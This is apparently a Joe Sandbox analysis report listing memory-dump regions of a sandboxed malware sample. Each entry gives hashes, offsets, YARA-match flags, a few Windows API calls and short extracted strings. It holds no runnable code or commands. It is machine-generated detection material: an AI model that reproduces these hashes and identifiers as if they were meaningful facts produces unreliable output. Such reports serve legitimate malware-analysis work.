                                                    • Instruction ID: e80ba316238a52440995120652ccb2ba54186a16ce09c0288fdc6cfb70fcf59f
                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                    • Instruction Fuzzy Hash: A0F13071E00219DFDF14CFA9D9806ADF7B1FF88324F2582A9D919AB344D731A941DB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                    • Instruction ID: b8b31c7c7d4b51565c9f0be571567412a69d2e0e61470088d295795398052e15
                                                    • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                    • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID:
                                                    • API String ID: 4168288129-0
                                                    • Opcode ID: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                                    • Instruction ID: 3f6a67a305f66c5e7a4f14eedf4bc49c5343a177f11854dd6e9b10dc1c656e69
                                                    • Opcode Fuzzy Hash: 74712b48cc111f858d1a31e9ba76b8487e7a66425b713155efa2ae010c3ee8cc
                                                    • Instruction Fuzzy Hash: 1DC25B71E046288FDBA4DE29DD407E9B3B6EB48314F1441EADA0DE7240E778BE858F50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 1n{$~4U
                                                    • API String ID: 0-3046700990
                                                    • Opcode ID: 6ef9d189c54171cd56bef012729b75a4df48cc12fe5b5f8f62421c68b0af4ed3
                                                    • Instruction ID: e1ec9b4f2d05fd8c3f38537f787f8287a351176f93494ce82d0203a7bce2c2b8
                                                    • Opcode Fuzzy Hash: 6ef9d189c54171cd56bef012729b75a4df48cc12fe5b5f8f62421c68b0af4ed3
                                                    • Instruction Fuzzy Hash: 0E6129F3A082009BE3046A2DDC8476EF7E6EFD4320F1B063DDBC897784E97518058696
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %DA]
                                                    • API String ID: 0-1032058369
                                                    • Opcode ID: 21ab1cbd0e970b1d4c176073d2ffdb79de96cc7428d9bd76ccf843f59286281f
                                                    • Instruction ID: fe33902944b125135c1e4a22aba535699f3c72cc569366d5facae789c5913d44
                                                    • Opcode Fuzzy Hash: 21ab1cbd0e970b1d4c176073d2ffdb79de96cc7428d9bd76ccf843f59286281f
                                                    • Instruction Fuzzy Hash: 9F5207F39083049FD3046E2DEC8567AFBE9EF94720F19863DEAD483744EA3598058697
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: W|
                                                    • API String ID: 0-2370748732
                                                    • Opcode ID: 32402da787cd13bcffe5004b6f1d1d865e86a8bdb20decc8b15f24b7c77c2938
                                                    • Instruction ID: 0ea2a59dcf479404323d6c437a867a4b902b49c455c3710f48fd0896a175b169
                                                    • Opcode Fuzzy Hash: 32402da787cd13bcffe5004b6f1d1d865e86a8bdb20decc8b15f24b7c77c2938
                                                    • Instruction Fuzzy Hash: 4E3205F39082149FD304AE2DEC8577AFBE9EF94620F1A453DEAC4D7344E63558048796
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04B53F48,?,?,00000008,?,?,04B5AB25,00000000), ref: 04B5417A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                    • Instruction ID: 851bf4821145136d6815e672a2d621058b53c36e9e3f86bff6807aee8922e64a
                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                    • Instruction Fuzzy Hash: 84B13F35610605DFDB15CF28C486B65BBE0FF45365F298698E899CF2B2C336E992CB40
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                    • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                    • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                    • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                    • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                    • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                    • Instruction ID: 2a02ed98e1fb0d2dcd136e8a3c24fc4c13b555c0caf67f709e2798379d18ada7
                                                    • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                    • Instruction Fuzzy Hash: 4B41A2B5804218AFDF20DF79CC88BAAFBB8EB45304F5442D9E85DD3210DA35AE858F50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2705826801.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                    • Associated: 00000000.00000002.2705802007.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705853981.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000000.00000002.2705880835.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_10000000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                    • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                    • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                    • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                    • Instruction ID: 5ef8e782818ac5c356667e56c32e051b370d413b7f744af6f0ed5b3d29dfc074
                                                    • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                    • Instruction Fuzzy Hash: 5141B6B1C04618AFDB24DF69CC89AEABBB8EF85304F1442DEE41DD3211DA359E858F14
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00409955,04B497B6), ref: 04B49BB5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                    • Instruction Fuzzy Hash:
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                    • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                    • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                    • Instruction Fuzzy Hash:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                    • Instruction ID: 1b20faf3ed2e5a3898006549f2bdd42645f964e378022ed5f9256f9bdd23f1cc
                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                    • Instruction Fuzzy Hash: 8B5148716006895AFB3C9E2F86A97BE679B9F02304F080419D587D7281EB15FB47D352
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                    • Instruction ID: 4d038a623b67b2d4d8bb106c9519eaac79460430972acfb6e378cfe107750d19
                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                    • Instruction Fuzzy Hash: 0751687134078896EB38CA2FC895BBE779BAB02308F08442DD947DB280E715BB45F356
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                    • Instruction ID: b9f3cf54a43b37b6f63110615f6ebe7ae02d2151f078c9cebda4c17c6b13ec97
                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                    • Instruction Fuzzy Hash: 05515B7070064866EF799E6C88D47BE77EEDBC2308F0409DED48ADB281E625F944B752
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2704847781.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b40000_3K6rBUOQ2z.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                    • Instruction ID: 27f77c7acea2fc84f8a590b6e4e10ead9a2a83a80aada22a30ccf30e84eacb9e
                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                    • Instruction Fuzzy Hash: 4D516C30704648A6EF389EAC88947BE679DEBD2708F0805DED482D72C1D661F946F352
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                    • Instruction ID: c0798f424e7f96b2d13f24c6de611a6824aa2a21751a5330029b757c988de18e
                                                    • Opcode Fuzzy Hash: 9a85c65c23f40ba50eec2c71843e9256c62c19b7261cd3c4027d58e76c3ffa22
                                                    • Instruction Fuzzy Hash: 8A513870E04644AADB389AED88957BF67999F01308F54043FD882F73C1D67DAD4E861E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0
                                                    • API String ID: 0-4108050209
                                                    • Opcode ID: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                    • Instruction ID: 624e85d5d4f9056646b760ddf11ce83fdf6d5af507a6eedaef23f3504edbf722
                                                    • Opcode Fuzzy Hash: ebf2076ba5d84d712d2fc479d53ed6216a00f6ab66c0a6a9d0d2c4e0e479908f
                                                    • Instruction Fuzzy Hash: B5512370E0474896DB389AE88895BBF67995B12308F14483FD84AF73C1C67E9D4EC61E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NTDL
                                                    • API String ID: 0-3662016964
                                                    • Opcode ID: 19579dbed616a0f2090c1b7647e72d662b241aa7157a070c1aee2e8c37d5cbbc
                                                    • Instruction ID: a9e6939d31161328d1386a82fb21a394cf9037845af5c090fa7e985f90ee4e5b
                                                    • Opcode Fuzzy Hash: 19579dbed616a0f2090c1b7647e72d662b241aa7157a070c1aee2e8c37d5cbbc
                                                    • Instruction Fuzzy Hash: F361D5B25C821E8BDB11CF64C5462EF7FA8FF46330F20412AD842D7A02D6B25D91DB99
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 'Lh
                                                    • API String ID: 0-2531073743
                                                    • Opcode ID: c463b617c0c7a2893f09772059d54f5e80c1ec62bf70ebd533c5a6f3ac0d503c
                                                    • Instruction ID: e5b0c4baa0da388c97757fba6b63aef398d6ae319585bf37dd651ce0826c6d41
                                                    • Opcode Fuzzy Hash: c463b617c0c7a2893f09772059d54f5e80c1ec62bf70ebd533c5a6f3ac0d503c
                                                    • Instruction Fuzzy Hash: 765107F3A092048BE304AE3DDC9472AF7E6EFD0710F2B863DDAC487784E97958058656
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A9A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a9a000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: V
                                                    • API String ID: 0-1342839628
                                                    • Opcode ID: 773c58fa1b8ca3f3a51dfc28e9dd5a42f904d7349570e707f0e6f2c12777f870
                                                    • Instruction ID: 2349070de9973405197460f4aa05a1dd9a4f39666b3c25f7464558e5b15efa5b
                                                    • Opcode Fuzzy Hash: 773c58fa1b8ca3f3a51dfc28e9dd5a42f904d7349570e707f0e6f2c12777f870
                                                    • Instruction Fuzzy Hash: D1E092B27842552FE705EE646A11BFF7AACDB92630F60842EF405CAA42E3920C154676
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                    • Instruction ID: 98ac959fbcbf31f9aa391364da723e162a93da40453b3f395bdb6a7f0ce9ff37
                                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                    • Instruction Fuzzy Hash: 75322131E28F414DD7639634CC22336A299AFB73C5F95D737E81AB5EA6EB28D1834104
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702285605.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2702285605.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                    • Instruction ID: 77e6785c828baecb52582d09b1b14edac196714ae9321c17d64660e5f0acdfa7
                                                    • Opcode Fuzzy Hash: 86f883b8ef09fd6965bd3e087f319760c5b95891c44b121a5311ec8dd1b45090
                                                    • Instruction Fuzzy Hash: DB320531E69F414DD7239634D822336A288AFB73D5F55D737E826B5EA6EB28C4C34108
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 95580cf29d4255e59ec1a441a8b7d61e15a95ea94f22da89c819a137c134b048
                                                    • Instruction ID: c5eb2fa1b4ba90e47dc54201e26d73a290eeadc6a4eb38abf472d40b7a02332f
                                                    • Opcode Fuzzy Hash: 95580cf29d4255e59ec1a441a8b7d61e15a95ea94f22da89c819a137c134b048
                                                    • Instruction Fuzzy Hash: 4FC1ACF7E1112547F3544D28CC983A27283DBE5325F2F82388F58ABBC5D97E9D0A5684
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 161649a488b4589f614f2ac1023d8e83283b2f159bc83aef3dfe8c6bd48bb750
                                                    • Instruction ID: 2d6f59fa59b8751e509cff4c3046cd5bf0fa70d9afff98f4c2d601759d36c6ba
                                                    • Opcode Fuzzy Hash: 161649a488b4589f614f2ac1023d8e83283b2f159bc83aef3dfe8c6bd48bb750
                                                    • Instruction Fuzzy Hash: 3691A0F3F106254BF3144979CCA83A26583DBE5325F2F4278CA5CAB7C5D8BE9D0A5284
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1864568328.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_4ce0000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                    • Instruction ID: c7031f03101d0202a692070b25accc8ab3173f42828be11aaf8418cf64763123
                                                    • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                    • Instruction Fuzzy Hash: B6B17D31210648EFD754CF18C886B647BA2FF05364F298658ED99CF2B1C739EA82CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 815fbd3c554d9790c752f9c9d9cd200dffa04a6c12be1477c90ef15411e801a3
                                                    • Instruction ID: 834631cec9baf58475353c26e7e4712eb20c723676a441304d9e5af93870c8c1
                                                    • Opcode Fuzzy Hash: 815fbd3c554d9790c752f9c9d9cd200dffa04a6c12be1477c90ef15411e801a3
                                                    • Instruction Fuzzy Hash: 077117F3E081209BE3045A1CDC457BABBD6EBD4335F1B463DDA8997780D97A5C0582C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 77b6ad5287a72081ecd3a41502b24f83cdb34735ec5281e8c41fd3d658f8a42b
                                                    • Instruction ID: 08cc84d6d30d7e96dbf44950f0d268cad5b07112396fc3b9c0efea7a95f04eae
                                                    • Opcode Fuzzy Hash: 77b6ad5287a72081ecd3a41502b24f83cdb34735ec5281e8c41fd3d658f8a42b
                                                    • Instruction Fuzzy Hash: 1D61F7F3A08210AFE304AE29DD9477AF7E5EB94710F16893EE6C4D7384E5358C408786
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 84857036321fbb5625f66fc692a5032fadfadb50e045d1d694765fa2f2654215
                                                    • Instruction ID: 3f990f379efa8ba56cd9358b738bcd15d2d344cf8fda3b28a03b626c41322e46
                                                    • Opcode Fuzzy Hash: 84857036321fbb5625f66fc692a5032fadfadb50e045d1d694765fa2f2654215
                                                    • Instruction Fuzzy Hash: FF5133F3E186244BE3106D69DC44776FADAEBC4320F2B853EDA88A7780E878480586C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 63ff647e06ce553b737bb68de19fe2caa1048ffde5b780c9c77016bab925151f
                                                    • Instruction ID: 11adb1101dd51b8d5cc991fa535850a090febc2035e07f424deaf4361dd99d78
                                                    • Opcode Fuzzy Hash: 63ff647e06ce553b737bb68de19fe2caa1048ffde5b780c9c77016bab925151f
                                                    • Instruction Fuzzy Hash: 085129B3E182145BE300A96DDC487ABBBD6DBC5360F17863DDF8897784E9395C0586C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2702508722.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_819000_3K6rBUOQ2z.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a45def61f6c16db91f0ffe067a15c73310bbca5a4563e6b2071eeb4ae12a04d
